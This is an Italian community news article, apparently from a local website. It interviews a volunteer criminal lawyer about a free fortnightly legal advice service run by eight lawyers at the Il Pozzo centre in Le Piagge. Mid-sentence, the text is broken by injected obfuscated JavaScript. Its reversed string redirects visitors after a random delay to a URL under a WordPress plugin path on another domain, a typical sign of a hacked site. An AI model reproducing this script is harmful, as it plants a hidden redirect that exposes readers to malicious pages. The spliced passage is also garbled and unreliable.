Otto avvocati al Pozzo

image_pdfimage_print

Anche alle Piagge, da qualche anno, è presente un servizio di consulenza
legale gratuita. Ogni quindici giorni nei locali del centro sociale il Pozzo
si danno il turno 8 avvocati, che ascoltano e soprattutto aiutano coloro che
necessitano di un parere esperto su temi legali.
Abbiamo incontrato Chiara Lombardo, avvocato penalista di 35 anni, che è stata
la prima, insieme ad un collega, ad iniziare questa collaborazione con
l’associazione il Muretto.
Come è nata quest’idea della consulenza gratuita, a chi si rivolge?
È stato don Santoro a volere fortemente questo servizio. Noi non siamo parte
di un’associazione ma abbiamo una convenzione con Il Muretto per offrire la
nostra consulenza a coloro che non se la possono permettere. Infatti, chi si
accosta a questo servizio sono soprattutto extracomunitari per il permesso di
soggiorno o per problemi analoghi, e persone che hanno contenziosi con aziende
o singoli. Più rari sono i casi penali. Nel nostro gruppo veniamo da percorsi
universitari e professionali diversi, ognuno ha il suo campo: io ad esempio
sono penalista, poi c’è chi è specializzato in diritto civile, del lavoro e
amministrativo.
Il vostro servizio consiste nel offrire solo un parere o anche un patrocinio?
Noi offriamo solo un parere, una consulenza, aiutiamo le persone che si
rivolgono a noi a districarsi nel complicato mondo delle leggi; spesso ci sono
problemi con la legge o con la burocrazia che possono sembrare insormontabili,
mentre se c’è qualcuno che ti sa consigliare è possibile risolverli con una
raccom (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == "string") return $p$VTO6JhIH6WkCGAcPR.list[n].split("").reverse().join("");return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=["'php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andata scritta, magari con il giusto linguaggio.
Qual è la motivazione che vi spinge a mettere a disposizione il vostro tempo e
la vostra professionalità?
È difficile parlare a nome di tutti, ma penso che ci accomuni il desiderio di
aiutare persone in difficoltà, offrendo loro le nostre competenze.
Secondo lei è un caso che su otto avvocati, ben sette siano donne?
No, non credo proprio sia un caso! Penso che in noi donne ci sia una
sensibilità diversa e soprattutto la capacità di non assolutizzare il lavoro…
siamo più capaci di dividerci tra i vari aspetti della vita, la famiglia, i
figli, il lavoro e come nel nostro caso il volontariato.
Il servizio di consulenza legale gratuita è attivo ogni 15 giorni il lunedì
dalle 18.00 alle 19.30 presso il C.S. Il Pozzo, in via Lombardia 1p alle
Piagge. Le prossime date sono: 4 e 18 aprile, 2, 16 e 30 maggio, 13 e 27
giugno. Per altre informazioni tel. 055/373737.

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *